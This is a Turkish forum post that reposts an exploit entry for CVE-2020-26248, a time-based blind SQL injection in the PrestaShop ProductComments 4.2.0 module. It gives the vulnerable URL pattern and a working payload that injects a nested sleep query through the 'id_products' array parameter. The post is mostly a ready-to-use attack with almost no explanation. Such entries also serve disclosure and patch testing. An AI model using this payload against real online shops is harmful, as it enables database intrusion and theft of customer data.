Hoşgeldin Misafir

PrestaShop ProductComments 4.2.0 - (id_products) Time Based Blind SQL Injection Vulne

Asım Gürsoy

mersin
27 Mar 2020
8,833 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
PrestaShop ProductComments 4.2.0 - (id_products) Time Based Blind SQL Injection Vulnerability--


Kod:
# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
# Exploit Author: Frederic ADAM
# Author contact: [email protected]
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://github.com/PrestaShop/productcomments
# Version: 4.2.0
# Tested on: Debian 10
# CVE : CVE-2020-26248
 
http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL]
 
Example:
http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)
 
#  0day.today [2020-12-19]  #